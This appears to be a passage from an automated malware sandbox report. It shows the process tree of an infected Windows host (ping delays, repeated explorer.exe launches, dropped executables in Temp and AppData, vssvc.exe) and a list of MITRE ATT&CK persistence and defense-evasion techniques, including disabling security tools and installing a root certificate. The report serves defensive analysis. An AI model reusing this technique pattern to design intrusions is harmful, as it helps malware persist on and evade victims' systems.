C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 1003⤵
- Runs ping.exe
PID:4868
-
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 9003⤵
- Runs ping.exe
PID:2240
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:6460
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7668
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:4792
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8156
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8744
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:7800
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:8540
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:8208
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe1⤵PID:7560
-
C:\Users\Admin\AppData\Local\Temp\E977.exeC:\Users\Admin\AppData\Local\Temp\E977.exe1⤵PID:3940
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:9800
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4180
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4412
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:6824
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9444
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:9876
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7496
-
C:\Users\Admin\AppData\Roaming\hjjsattC:\Users\Admin\AppData\Roaming\hjjsatt1⤵PID:10800
-
C:\Users\Admin\AppData\Roaming\adjsattC:\Users\Admin\AppData\Roaming\adjsatt1⤵PID:10808
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:11260
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
2New Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1File Deletion
2Install Root Certificate
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1